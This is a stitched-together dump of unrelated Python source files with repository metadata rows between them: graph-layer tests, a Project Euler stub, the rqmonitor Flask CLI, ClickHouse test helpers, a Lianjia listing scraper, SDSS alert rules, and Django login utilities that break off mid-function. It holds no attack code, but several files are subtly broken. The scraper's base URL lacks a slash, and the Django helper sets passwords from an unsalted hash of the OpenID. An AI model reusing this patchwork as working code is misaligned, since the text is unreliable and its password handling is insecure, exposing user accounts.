# Creating a second layer should produce different results, since it has
# different random weights.
layer2 = layers.GraphEmbedPoolLayer(num_vertices=6)
result2 = layer2(V, adjs)
assert not np.allclose(result[0], result2[0])
assert not np.allclose(result[1], result2[1])
# But evaluating the first layer again should produce the same result as before.
result3 = layer(V, adjs)
assert np.allclose(result[0], result3[0])
assert np.allclose(result[1], result3[1])
def test_graph_cnn(self):
"""Test invoking GraphCNN in eager mode."""
with context.eager_mode():
V = np.random.uniform(size=(10, 100, 50)).astype(np.float32)
adjs = np.random.uniform(size=(10, 100, 5, 100)).astype(np.float32)
layer = layers.GraphCNN(num_filters=6)
result = layer(V, adjs)
assert result.shape == (10, 100, 6)
# Creating a second layer should produce different results, since it has
# different random weights.
layer2 = layers.GraphCNN(num_filters=6)
result2 = layer2(V, adjs)
assert not np.allclose(result, result2)
# But evaluating the first layer again should produce the same result as before.
result3 = layer(V, adjs)
assert np.allclose(result, result3)
def test_hinge_loss(self):
"""Test invoking HingeLoss in eager mode."""
with context.eager_mode():
n_labels = 1
n_logits = 1
logits = np.random.rand(n_logits).astype(np.float32)
labels = np.random.rand(n_labels).astype(np.float32)
result = layers.HingeLoss()(labels, logits)
assert result.shape == (n_labels,)
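# Illustrative sketch (not part of the original test file): the "different random
# weights vs. reproducible re-evaluation" pattern repeated in several tests above,
# factored into a helper. `make_layer` and `inputs` are hypothetical placeholders.
def _assert_randomly_initialized_but_deterministic(make_layer, *inputs):
    first_layer = make_layer()
    result = first_layer(*inputs)
    # A freshly created layer has different random weights, so results should differ.
    assert not np.allclose(result, make_layer()(*inputs))
    # Re-evaluating the original layer should reproduce its earlier result.
    assert np.allclose(result, first_layer(*inputs))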
| 37.264995 | 94 | 0.654747 | 4,572 | 34,172 | 4.768591 | 0.071085 | 0.052426 | 0.052289 | 0.043345 | 0.760618 | 0.712503 | 0.676131 | 0.639116 | 0.612054 | 0.571874 | 0 | 0.032992 | 0.231856 | 34,172 | 916 | 95 | 37.305677 | 0.797592 | 0.166803 | 0 | 0.538922 | 0 | 0 | 0.000427 | 0 | 0 | 0 | 0 | 0.001092 | 0.208084 | 1 | 0.094311 | false | 0 | 0.013473 | 0 | 0.109281 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
c4f8a7e27a6b1a8b93095262140e88ebc073c0f4 | 790 | py | Python | py/py_0049_prime_permutations.py | lcsm29/project-euler | fab794ece5aa7a11fc7c2177f26250f40a5b1447 | [
"MIT"
] | null | null | null | py/py_0049_prime_permutations.py | lcsm29/project-euler | fab794ece5aa7a11fc7c2177f26250f40a5b1447 | [
"MIT"
] | null | null | null | py/py_0049_prime_permutations.py | lcsm29/project-euler | fab794ece5aa7a11fc7c2177f26250f40a5b1447 | [
"MIT"
] | null | null | null | # Solution of;
# Project Euler Problem 49: Prime permutations
# https://projecteuler.net/problem=49
#
# The arithmetic sequence, 1487, 4817, 8147, in which each of the terms
# increases by 3330, is unusual in two ways: (i) each of the three terms are
# prime, and, (ii) each of the 4-digit numbers are permutations of one
# another. There are no arithmetic sequences made up of three 1-, 2-, or
# 3-digit primes, exhibiting this property, but there is one other 4-digit
# increasing sequence. What 12-digit number do you form by concatenating the
# three terms in this sequence?
#
# by lcsm29 http://github.com/lcsm29/project-euler
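# Illustrative sketch only (the file below just registers a dummy with the timing
# harness); one direct way to search for the sequences described in the problem
# statement above.
def _is_prime(n):
    if n < 2:
        return False
    d = 2
    while d * d <= n:
        if n % d == 0:
            return False
        d += 1
    return True


def _prime_permutation_sequences():
    for a in range(1000, 10000):
        for step in range(1, (9999 - a) // 2 + 1):
            b, c = a + step, a + 2 * step
            if (_is_prime(a) and _is_prime(b) and _is_prime(c)
                    and sorted(str(a)) == sorted(str(b)) == sorted(str(c))):
                yield a, b, c  # e.g. (1487, 4817, 8147) with step 3330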
import timed
def dummy(n):
pass
if __name__ == '__main__':
n = 1000
i = 10000
prob_id = 49
timed.caller(dummy, n, i, prob_id)
| 30.384615 | 77 | 0.711392 | 127 | 790 | 4.346457 | 0.622047 | 0.032609 | 0.048913 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.066456 | 0.2 | 790 | 25 | 78 | 31.6 | 0.806962 | 0.775949 | 0 | 0 | 0 | 0 | 0.04908 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125 | false | 0.125 | 0.125 | 0 | 0.25 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
c4f93be850b5b4fb3f0bf11c18b271c4dd267dcc | 8,879 | py | Python | rqmonitor/cli.py | trodery/rqmonitor | 65831337591afe6887dec2dbb37a28d84f881f35 | [
"Apache-2.0"
] | null | null | null | rqmonitor/cli.py | trodery/rqmonitor | 65831337591afe6887dec2dbb37a28d84f881f35 | [
"Apache-2.0"
] | null | null | null | rqmonitor/cli.py | trodery/rqmonitor | 65831337591afe6887dec2dbb37a28d84f881f35 | [
"Apache-2.0"
] | null | null | null | """
This reference script has been taken from rq-dashboard with some modifications
"""
import importlib
import logging
import os
import sys
from urllib.parse import quote as urlquote, urlunparse
from redis.connection import (URL_QUERY_ARGUMENT_PARSERS,
UnixDomainSocketConnection,
SSLConnection)
from urllib.parse import urlparse, parse_qs, unquote
import click
from flask import Flask, Response, request
from rqmonitor.defaults import RQ_MONITOR_REDIS_URL, RQ_MONITOR_REFRESH_INTERVAL
from rqmonitor.version import VERSION
from rqmonitor.bp import monitor_blueprint
logger = logging.getLogger("werkzeug")
def add_basic_auth(blueprint, username, password, realm="RQ Monitor"):
"""Add HTTP Basic Auth to a blueprint.
Note this is only for casual use!
"""
@blueprint.before_request
def basic_http_auth(*args, **kwargs):
auth = request.authorization
if auth is None or auth.password != password or auth.username != username:
return Response(
"Please login",
401,
{"WWW-Authenticate": 'Basic realm="{}"'.format(realm)},
)
def create_app_with_blueprint(config=None, username=None, password=None,
url_prefix='', blueprint=monitor_blueprint):
"""Return Flask app with default configuration and registered blueprint."""
app = Flask(__name__)
# Override with any settings in config file, if given.
if config:
app.config.from_object(importlib.import_module(config))
# Override from a configuration file in the env variable, if present.
if "RQ_MONITOR_SETTINGS" in os.environ:
app.config.from_envvar("RQ_MONITOR_SETTINGS")
# Optionally add basic auth to blueprint and register with app.
if username:
add_basic_auth(blueprint, username, password)
app.register_blueprint(blueprint, url_prefix=url_prefix)
return app
def check_url(url, decode_components=False):
"""
    Taken from redis-py to perform a basic check before passing the URL on to redis-py.
    Kept here so errors surface before the app launches.
For example::
redis://[[username]:[password]]@localhost:6379/0
rediss://[[username]:[password]]@localhost:6379/0
unix://[[username]:[password]]@/path/to/socket.sock?db=0
Three URL schemes are supported:
- ```redis://``
<https://www.iana.org/assignments/uri-schemes/prov/redis>`_ creates a
normal TCP socket connection
- ```rediss://``
<https://www.iana.org/assignments/uri-schemes/prov/rediss>`_ creates
a SSL wrapped TCP socket connection
- ``unix://`` creates a Unix Domain Socket connection
There are several ways to specify a database number. The parse function
will return the first specified option:
1. A ``db`` querystring option, e.g. redis://localhost?db=0
2. If using the redis:// scheme, the path argument of the url, e.g.
redis://localhost/0
3. The ``db`` argument to this function.
If none of these options are specified, db=0 is used.
The ``decode_components`` argument allows this function to work with
percent-encoded URLs. If this argument is set to ``True`` all ``%xx``
escapes will be replaced by their single-character equivalents after
the URL has been parsed. This only applies to the ``hostname``,
``path``, ``username`` and ``password`` components.
Any additional querystring arguments and keyword arguments will be
passed along to the ConnectionPool class's initializer. The querystring
arguments ``socket_connect_timeout`` and ``socket_timeout`` if supplied
are parsed as float values. The arguments ``socket_keepalive`` and
``retry_on_timeout`` are parsed to boolean values that accept
True/False, Yes/No values to indicate state. Invalid types cause a
``UserWarning`` to be raised. In the case of conflicting arguments,
querystring arguments always win.
"""
url = urlparse(url)
url_options = {}
for name, value in (parse_qs(url.query)).items():
if value and len(value) > 0:
parser = URL_QUERY_ARGUMENT_PARSERS.get(name)
if parser:
try:
url_options[name] = parser(value[0])
except (TypeError, ValueError):
logger.warning(UserWarning(
"Invalid value for `%s` in connection URL." % name
))
else:
url_options[name] = value[0]
if decode_components:
username = unquote(url.username) if url.username else None
password = unquote(url.password) if url.password else None
path = unquote(url.path) if url.path else None
hostname = unquote(url.hostname) if url.hostname else None
else:
username = url.username or None
password = url.password or None
path = url.path
hostname = url.hostname
# We only support redis://, rediss:// and unix:// schemes.
if url.scheme == 'unix':
url_options.update({
'username': username,
'password': password,
'path': path,
'connection_class': UnixDomainSocketConnection,
})
elif url.scheme in ('redis', 'rediss'):
url_options.update({
'host': hostname,
'port': int(url.port or 6379),
'username': username,
'password': password,
})
# If there's a path argument, use it as the db argument if a
# querystring value wasn't specified
if 'db' not in url_options and path:
try:
url_options['db'] = int(path.replace('/', ''))
except (AttributeError, ValueError):
pass
if url.scheme == 'rediss':
url_options['connection_class'] = SSLConnection
else:
valid_schemes = ', '.join(('redis://', 'rediss://', 'unix://'))
raise ValueError('Redis URL must specify one of the following '
'schemes (%s)' % valid_schemes)
return True
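# Usage sketch (illustrative, not part of the CLI): the URL forms documented in the
# docstring above all validate, while an unsupported scheme raises ValueError.
#   check_url("redis://:secret@localhost:6379/0")
#   check_url("rediss://localhost:6379/0?socket_timeout=2.5")
#   check_url("unix:///path/to/socket.sock?db=0")
#   check_url("http://localhost")  # ValueError: Redis URL must specify one of the supported schemes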
@click.command()
@click.option(
"-b",
"--bind",
default="0.0.0.0",
help="IP or hostname on which to bind HTTP server",
)
@click.option(
"-p", "--port", default=8899, type=int, help="Port on which to bind HTTP server"
)
@click.option(
"--url-prefix", default="", help="URL prefix e.g. for use behind a reverse proxy"
)
@click.option(
"--username", default=None, help="HTTP Basic Auth username (not used if not set)"
)
@click.option("--password", default=None, help="HTTP Basic Auth password")
@click.option(
"-c",
"--config",
default=None,
help="Configuration file (Python module on search path)",
)
@click.option(
"-u",
"--redis-url",
default=[RQ_MONITOR_REDIS_URL],
multiple=True,
help="Redis URL. Can be specified multiple times. Default: redis://127.0.0.1:6379",
)
@click.option(
"--refresh-interval",
"--interval",
"refresh_interval",
default=RQ_MONITOR_REFRESH_INTERVAL,
type=int,
help="Refresh interval in ms",
)
@click.option(
"--extra-path",
default=".",
multiple=True,
help="Append specified directories to sys.path",
)
@click.option("--debug/--normal", default=False, help="Enter DEBUG mode")
@click.option(
"-v", "--verbose", is_flag=True, default=False, help="Enable verbose logging"
)
def run(
bind,
port,
url_prefix,
username,
password,
config,
redis_url,
refresh_interval,
extra_path,
debug,
verbose,
):
"""Run the RQ Monitor Flask server.
All configuration can be set on the command line or through environment
variables of the form RQ_MONITOR_*. For example RQ_MONITOR_USERNAME.
A subset of the configuration (the configuration parameters used by the
underlying flask blueprint) can also be provided in a Python module
referenced using --config, or with a .cfg file referenced by the
RQ_MONITOR_SETTINGS environment variable.
"""
if extra_path:
sys.path += list(extra_path)
click.echo("RQ Monitor version {}".format(VERSION))
app = create_app_with_blueprint(config, username, password, url_prefix, monitor_blueprint)
app.config["RQ_MONITOR_REDIS_URL"] = redis_url
app.config["RQ_MONITOR_REFRESH_INTERVAL"] = refresh_interval
# Conditionally disable Flask console messages
# See: https://stackoverflow.com/questions/14888799
if verbose:
logger.setLevel(logging.DEBUG)
else:
logger.setLevel(logging.ERROR)
logger.error(" * Running on {}:{}".format(bind, port))
for url in redis_url:
check_url(url)
app.run(host=bind, port=port, debug=debug)
def main():
run(auto_envvar_prefix="RQ_MONITOR")
if __name__ == '__main__':
main() | 32.52381 | 94 | 0.64692 | 1,108 | 8,879 | 5.083935 | 0.278881 | 0.023966 | 0.007456 | 0.009054 | 0.069945 | 0.049352 | 0.026274 | 0.026274 | 0 | 0 | 0 | 0.007909 | 0.245298 | 8,879 | 273 | 95 | 32.52381 | 0.832712 | 0.328077 | 0 | 0.150602 | 0 | 0.006024 | 0.175335 | 0.008523 | 0 | 0 | 0 | 0 | 0 | 1 | 0.036145 | false | 0.072289 | 0.078313 | 0 | 0.13253 | 0.048193 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
c4fbf075eb619be044717172093dd9b2c09291e8 | 1,579 | py | Python | dbms/tests/integration/helpers/test_tools.py | qqiangwu/ClickHouse | 4700d375d8238ca3d7f39a1d0001f173272bbf3a | [
"Apache-2.0"
] | 4 | 2020-04-27T13:03:31.000Z | 2020-10-15T09:51:13.000Z | dbms/tests/integration/helpers/test_tools.py | RCcode/ClickHouse | ccfb51b8dd680a8ad2863e0b2f4e32364b86daf2 | [
"Apache-2.0"
] | 8 | 2018-11-21T09:45:25.000Z | 2018-11-21T13:53:40.000Z | dbms/tests/integration/helpers/test_tools.py | RCcode/ClickHouse | ccfb51b8dd680a8ad2863e0b2f4e32364b86daf2 | [
"Apache-2.0"
] | 2 | 2018-12-17T13:08:09.000Z | 2022-01-26T08:50:20.000Z | import difflib
import time
class TSV:
"""Helper to get pretty diffs between expected and actual tab-separated value files"""
def __init__(self, contents):
raw_lines = contents.readlines() if isinstance(contents, file) else contents.splitlines(True)
self.lines = [l.strip() for l in raw_lines if l.strip()]
def __eq__(self, other):
return self.lines == other.lines
def __ne__(self, other):
return self.lines != other.lines
def diff(self, other, n1=None, n2=None):
return list(line.rstrip() for line in difflib.unified_diff(self.lines, other.lines, fromfile=n1, tofile=n2))[2:]
def __str__(self):
return '\n'.join(self.lines)
@staticmethod
def toMat(contents):
return [line.split("\t") for line in contents.split("\n") if line.strip()]
def assert_eq_with_retry(instance, query, expectation, retry_count=20, sleep_time=0.5, stdin=None, timeout=None, settings=None, user=None, ignore_error=False):
expectation_tsv = TSV(expectation)
for i in xrange(retry_count):
try:
if TSV(instance.query(query)) == expectation_tsv:
break
time.sleep(sleep_time)
except Exception as ex:
print "assert_eq_with_retry retry {} exception {}".format(i + 1, ex)
time.sleep(sleep_time)
else:
val = TSV(instance.query(query))
if expectation_tsv != val:
raise AssertionError("'{}' != '{}'\n{}".format(expectation_tsv, val, '\n'.join(expectation_tsv.diff(val, n1="expectation", n2="query"))))
| 38.512195 | 159 | 0.645978 | 212 | 1,579 | 4.641509 | 0.419811 | 0.045732 | 0.042683 | 0.057927 | 0.075203 | 0.075203 | 0.075203 | 0.075203 | 0 | 0 | 0 | 0.00978 | 0.222926 | 1,579 | 40 | 160 | 39.475 | 0.792176 | 0 | 0 | 0.064516 | 0 | 0 | 0.054923 | 0 | 0 | 0 | 0 | 0 | 0.096774 | 0 | null | null | 0 | 0.064516 | null | null | 0.032258 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
f204e6f22d0c9b479799a0897aaa41e742212566 | 5,767 | py | Python | Lianjia/LianjiaErShouFang.py | Detailscool/YHSpider | ab1276c9167f70fed3ccff17e02fb62d51e4a469 | [
"MIT"
] | 1 | 2017-05-04T08:10:34.000Z | 2017-05-04T08:10:34.000Z | Lianjia/LianjiaErShouFang.py | Detailscool/YHSpider | ab1276c9167f70fed3ccff17e02fb62d51e4a469 | [
"MIT"
] | null | null | null | Lianjia/LianjiaErShouFang.py | Detailscool/YHSpider | ab1276c9167f70fed3ccff17e02fb62d51e4a469 | [
"MIT"
] | null | null | null | # -*- coding:utf-8 -*-
import requests
from bs4 import BeautifulSoup
import sys
import csv
reload(sys)
sys.setdefaultencoding('utf-8')
def not_empty(str):
return str and str.strip()
if __name__ == '__main__':
url_main = 'http://gz.lianjia.com'
f = open(u'广州二手房.csv', 'wb')
f.write(unicode('\xEF\xBB\xBF', 'utf-8')) # file header (UTF-8 BOM)
writer = csv.writer(f)
writer.writerow(['区域', '小区名称', '户型', '面积', '价格(万)', '单价(元/平米)',
'性质', '朝向', '装修', '是否有电梯', '楼层', '建筑年代', '楼型'])
res = requests.get(url_main+'ershoufang')
res = res.text.encode(res.encoding).decode('utf-8')
soup = BeautifulSoup(res, 'html.parser')
# print soup.prettify()
districts = soup.find(name='div', attrs={'data-role':'ershoufang'}) # <div data-role="ershoufang">
# soup.select()
for district in districts.find_all(name='a'):
print district['title']
district_name = district.text # e.g. Dongcheng, Xicheng, Chaoyang, Haidian...
url = '%s%s' % (url_main, district['href'])
# print url
res = requests.get(url)
res = res.text.encode(res.encoding).decode('utf-8')
soup = BeautifulSoup(res,'html.parser')
# print soup.prettify()
page = soup.find('div', {'class':'page-box house-lst-page-box'})
if not page: # some districts (e.g. Pinggu) have no listings; skip them
continue
total_pages = dict(eval(page['page-data']))['totalPage'] # total number of pages
# print total_pages
for j in range(1, total_pages+1):
url_page = '%spg%d/' % (url, j)
res = requests.get(url_page)
res = res.text.encode(res.encoding).decode('utf-8')
soup = BeautifulSoup(res, 'html.parser')
# print soup.prettify()
sells = soup.find(name='ul', attrs={'class':'sellListContent', 'log-mod':'list'})
if not sells:
continue
# <a class="title" data-bl="list" data-el="ershoufang" data-log_index="1" href="XX" target="_blank">
titles = soup.find_all(name='a', attrs={'class':'title', 'data-bl':'list', 'data-el':'ershoufang'})
# <a data-el="region" data-log_index="1" href="X" target="_blank">
regions = sells.find_all(name='a', attrs={'data-el':'region'})
infos = sells.find_all(name='div', class_='houseInfo') # <div class="houseInfo">
infos2 = sells.find_all(name='div', class_='positionInfo') # <div class="positionInfo">
prices = sells.find_all(name='div', class_='totalPrice') # <div class="totalPrice">
unit_prices = sells.find_all(name='div', class_='unitPrice') # <div class="unitPrice" data-hid="X" data-price="X" data-rid="X">
subways = sells.find_all(name='span', class_='subway') # <span class="subway">
taxs = sells.find_all(name='span', class_='taxfree') # <span class="taxfree">
N = max(len(titles), len(regions), len(prices), len(unit_prices), len(subways), len(taxs), len(infos), len(infos2))
# for title, region, price, unit_price, subway, tax, info, info2 in zip(titles, regions, prices, unit_prices, subways, taxs, infos, infos2):
for i in range(N):
room_type = area = orientation = decoration = elevator = floor = year = slab_tower = None
title = titles[i] if len(titles) > i else None
region = regions[i] if len(regions) > i else None
price = prices[i] if len(prices) > i else None
unit_price = unit_prices[i] if len(unit_prices) > i else None
subway = subways[i] if len(subways) > i else None
tax = taxs[i] if len(taxs) > i else None
info = infos[i] if len(infos) > i else None
info2 = infos2[i] if len(infos2) > i else None
if title:
print 'Title: ', title.text
if region:
region = region.text
if price:
price = price.text
price = price[:price.find('万')]
if unit_price:
unit_price = unit_price.span.text.strip()
unit_price = unit_price[:unit_price.find('元/平米')]
if unit_price.find('单价') != -1:
unit_price = unit_price[2:]
if subway:
subway = subway.text.strip()
if tax:
tax = tax.text.strip()
if info:
info = info.text.split('|')
room_type = info[1].strip() # layout (rooms and halls)
area = info[2].strip() # floor area
area = area[:area.find('平米')]
orientation = info[3].strip().replace(' ', '') # orientation the unit faces
decoration = '-'
if len(info) > 4: # this field is empty for parking-space listings
decoration = info[4].strip() # decoration level: basic, medium, fine, luxury, other
elevator = '无'
if len(info) > 5:
elevator = info[5].strip() # elevator present: yes ('有') / no ('无')
if info2:
info2 = filter(not_empty, info2.text.split(' '))
floor = info2[0].strip()
info2 = info2[1]
year = info2[:info2.find('年')]
slab_tower = info2[info2.find('建')+1:]
print district_name, region, room_type, area, price, unit_price, tax, orientation, decoration, elevator, floor, year, slab_tower
writer.writerow([district_name, region, room_type, area, price, unit_price, tax, orientation, decoration, elevator, floor, year, slab_tower])
# break
# break
# break
f.close()
| 50.147826 | 157 | 0.521935 | 693 | 5,767 | 4.248196 | 0.262626 | 0.039742 | 0.033628 | 0.038043 | 0.284986 | 0.261889 | 0.210258 | 0.173913 | 0.149457 | 0.149457 | 0 | 0.010304 | 0.32686 | 5,767 | 114 | 158 | 50.587719 | 0.748068 | 0.133345 | 0 | 0.085106 | 0 | 0 | 0.088585 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.042553 | null | null | 0.031915 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
f209fda8f0cfe43f72b6eb3a30447ef4d992f64f | 6,764 | py | Python | python/alertsActor/rules/dangerKey.py | sdss/twistedAlertsActor | 857588f6da39b7716263f8bd8e3f1be8bb4ce0f7 | [
"BSD-3-Clause"
] | null | null | null | python/alertsActor/rules/dangerKey.py | sdss/twistedAlertsActor | 857588f6da39b7716263f8bd8e3f1be8bb4ce0f7 | [
"BSD-3-Clause"
] | null | null | null | python/alertsActor/rules/dangerKey.py | sdss/twistedAlertsActor | 857588f6da39b7716263f8bd8e3f1be8bb4ce0f7 | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/env python
# encoding: utf-8
#
# dangerKey.py
#
# Created by John Donor on 10 April 2019
import re, time
from yaml import YAMLObject
from alertsActor import log
class diskCheck(YAMLObject):
"""evaluate a disk keyword
"""
def __init__(self):
pass
def __call__(self, keyState):
"""The keyval is an enum ('Ok','Warning','Serious','Critical')
and the amount of free space (GB)
"""
keyval = keyState.keyword
if (keyval[0]).upper() == 'OK':
return "ok"
elif (keyval[0]).upper() == 'WARNING':
return "warn"
elif (keyval[0]).upper() == 'SERIOUS':
return "serious"
elif (keyval[0]).upper() == 'CRITICAL':
return "critical"
else:
return "info"
class doNothing(object):
"""camcheck alerts can't check themselves
dummy class to facilitate that
"""
def __init__(self):
pass
def __call__(self, keyState):
return keyState.severity
class camCheck(YAMLObject):
"""evaluate a camCheck alert
"""
def __init__(self):
# NEVER GETS CALLED!!!! -_-
pass
def generateCamCheckAlert(self, key, severity):
inst = key[:3]
side = key[3]
key = "camCheck." + key
instruments = ["boss"]
# most keywords will be SP[12][RB]
# check if they are and assign appropriate instruments
if inst in ["SP1", "SP2"]:
instruments.append("boss.{}".format(inst))
if side in ["R", "B"]:
instruments.append("boss.{}.{}".format(inst, side))
if severity in ["critical", "serious"]:
selfClear = False
addresses = self.emailAddresses
else:
selfClear = True
addresses = None
if key not in self.triggered:
self.triggered.append(key)
if key not in self.alertsActor.monitoring:
dumbCheck = doNothing()
self.alertsActor.addKey(key, severity=severity, checkAfter=120,
selfClear=selfClear, checker=dumbCheck,
keyword="'Reported by camCheck'",
instruments=instruments, emailAddresses=addresses,
emailDelay=0)
if self.alertsActor.monitoring[key].active:
self.alertsActor.monitoring[key].stampTime()
else:
self.alertsActor.monitoring[key].setActive(severity)
def __call__(self, keyState):
keyval = keyState.keyword
if self.alertsActor is None:
print("setting alertsActor for camCheck!!")
self.alertsActor = keyState.alertsActorReference
# do this only once hopefully
for i in ["boss.SP1", "boss.SP2", "boss.SP1.R", "boss.SP2.R",
"boss.SP1.B", "boss.SP2.B"]:
self.alertsActor.instrumentDown[i] = False
# print("CAMCHECK, len {}, type {}, key: {}".format(len(keyval), type(keyval), keyval))
log.info('CAMCHECK reported {}'.format(keyval))
if type(keyval) == str:
# could possibly try to fix this in hubModel casts, but easier here
keyval = [keyval]
if len(keyval) == 1 and keyval[0] == "None": # this is a bug somewhere upstream
keyval = []
for k in keyval:
if re.search(r"SP[12][RB][0-3]?CCDTemp", k):
self.generateCamCheckAlert(k, "critical")
elif re.search(r"SP[12]SecondaryDewarPress", k):
self.generateCamCheckAlert(k, "critical")
elif re.search(r"SP[12](DAQ|Mech|Micro)NotTalking", k):
self.generateCamCheckAlert(k, "critical")
elif re.search(r"DACS_SET", k):
self.generateCamCheckAlert(k, "critical")
elif re.search(r"SP[12]LN2Fill", k):
self.generateCamCheckAlert(k, "serious")
elif re.search(r"SP[12](Exec|Phase)Boot", k):
self.generateCamCheckAlert(k, "serious")
else:
self.generateCamCheckAlert(k, "warn")
for k in self.triggered:
if k.split(".")[-1] not in keyval: # b/c we know its camCheck already
self.alertsActor.monitoring[k].severity = "ok"
# now it can check itself and find out its cool
# and then decide to disappear if its acknowledged, etc etc
self.alertsActor.monitoring[k].checkKey()
self.triggered.remove(k)
# never flag camCheck, always monitored keys
return "ok"
class heartbeatCheck(YAMLObject):
"""check a heartbeat.
"""
def __init__(self):
pass
def __call__(self, keyState):
if time.time() - keyState.lastalive < keyState.checkAfter:
return "ok"
elif time.time() - keyState.lastalive > 5*keyState.checkAfter:
return "critical"
else:
return keyState.defaultSeverity
class above(YAMLObject):
"""literally: is the value too high
"""
def __init__(self):
pass
def __call__(self, keyState):
if keyState.keyword > keyState.dangerVal:
return keyState.defaultSeverity
else:
return "ok"
class below(YAMLObject):
"""literally: is the value too low
"""
def __init__(self):
pass
def __call__(self, keyState):
if keyState.keyword < keyState.dangerVal:
return keyState.defaultSeverity
else:
return "ok"
class neq(YAMLObject):
"""literally: is the value too low
"""
def __init__(self):
pass
def __call__(self, keyState):
if keyState.keyword != keyState.dangerVal:
return keyState.defaultSeverity
else:
return "ok"
class inList(YAMLObject):
"""is any value in the list "True", e.g. flagged
"""
def __init__(self):
pass
def __call__(self, keyState):
if [k for k in keyState.keyword if k]:
return keyState.defaultSeverity
else:
return "ok"
class firstElem(YAMLObject):
"""is any value in the list "True", e.g. flagged
"""
def __init__(self):
pass
def __call__(self, keyState):
if keyState.keyword[0] == keyState.dangerVal:
return keyState.defaultSeverity
else:
return "ok"
class default(object):
"""check equality to a dangerval
"""
def __init__(self):
pass
def __call__(self, keyState):
if keyState.keyword == keyState.dangerVal:
return keyState.defaultSeverity
else:
return "ok"
| 29.797357 | 95 | 0.563128 | 725 | 6,764 | 5.14069 | 0.286897 | 0.018782 | 0.029514 | 0.050979 | 0.356587 | 0.310706 | 0.297558 | 0.285216 | 0.266971 | 0.227529 | 0 | 0.009864 | 0.325547 | 6,764 | 226 | 96 | 29.929204 | 0.807102 | 0.161295 | 0 | 0.458904 | 0 | 0 | 0.078607 | 0.018306 | 0 | 0 | 0 | 0 | 0 | 1 | 0.143836 | false | 0.068493 | 0.020548 | 0.006849 | 0.383562 | 0.006849 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
f20a9c6a0a0f41308a9f256ea4ec3d2997af5cd5 | 6,388 | py | Python | eruditio/shared_apps/django_community/utils.py | genghisu/eruditio | 5f8f3b682ac28fd3f464e7a993c3988c1a49eb02 | [
"BSD-3-Clause",
"MIT"
] | null | null | null | eruditio/shared_apps/django_community/utils.py | genghisu/eruditio | 5f8f3b682ac28fd3f464e7a993c3988c1a49eb02 | [
"BSD-3-Clause",
"MIT"
] | null | null | null | eruditio/shared_apps/django_community/utils.py | genghisu/eruditio | 5f8f3b682ac28fd3f464e7a993c3988c1a49eb02 | [
"BSD-3-Clause",
"MIT"
] | null | null | null | """
Various utility functions used by django_community and
other apps to perform authentication-related tasks.
"""
import hashlib, re
import django.forms as forms
from django.core.exceptions import ObjectDoesNotExist
from django.forms import ValidationError
import django.http as http
from django.conf import settings
from django.contrib.contenttypes.models import ContentType
from django.contrib.contenttypes import generic
from django.contrib.auth import logout as auth_logout
from django.core.urlresolvers import reverse
from django.contrib.auth.models import User
from django.contrib.auth import authenticate, login
from django_community.models import UserOpenID, UserProfile
def openid_logout(request):
"""
Clears session which effectively logs out the current
OpenId user.
"""
request.session.flush()
def handle_logout(request):
"""
Log out.
"""
auth_logout(request)
def get_logged_user(request):
"""
Returns the currently logged-in user, checking for an OpenID user first
and then for a regular user. Returns None if no user is logged in.
"""
if settings.OPENID_ENABLED and hasattr(request, 'openid'):
user = UserOpenID.objects.get_for_openid(request, request.openid)
if not user:
user = request.user
return user
def handle_login(request, data):
"""
Logs the user in based on form data from django_community.LoginForm.
"""
user = authenticate(username = data.get('username', None),
password = data.get('password', None))
user_object = User.objects.get(username = data.get('username', None))
if user is not None:
login(request, user)
return user
def handle_signup(request, data):
"""
Signs a user up based on form data from django_community.SignupForm.
"""
username = data.get('username', None)
email = data.get('email', None)
password = data.get('password', None)
try:
user = User.objects.get(username = username, email = email)
except ObjectDoesNotExist:
user = User(username = username, email = email)
user.save()
user.set_password(password)
user_profile = UserProfile.objects.get_user_profile(user)
user = authenticate(username = username, password = password)
login(request, user)
return user
def get_or_create_from_openid(openid):
"""
Returns a User with the given openid, or
creates a new user and associates the openid with that user.
"""
try:
user = User.objects.get(username = openid)
except ObjectDoesNotExist:
password = hashlib.sha256(openid).hexdigest()
user = User(username = openid, email = '', password = password)
user.save()
user.display_name = "%s_%s" % ('user', str(user.id))
user.save()
return user
def generate_random_user_name():
"""
Generates a random user name user_{user_id}_{salt}
to be used for creating new users.
"""
import random
current_users = User.objects.all().order_by('-id')
if current_users:
next_id = current_users[0].id + 1
else:
next_id = 1
random_salt = random.randint(1, 5000)
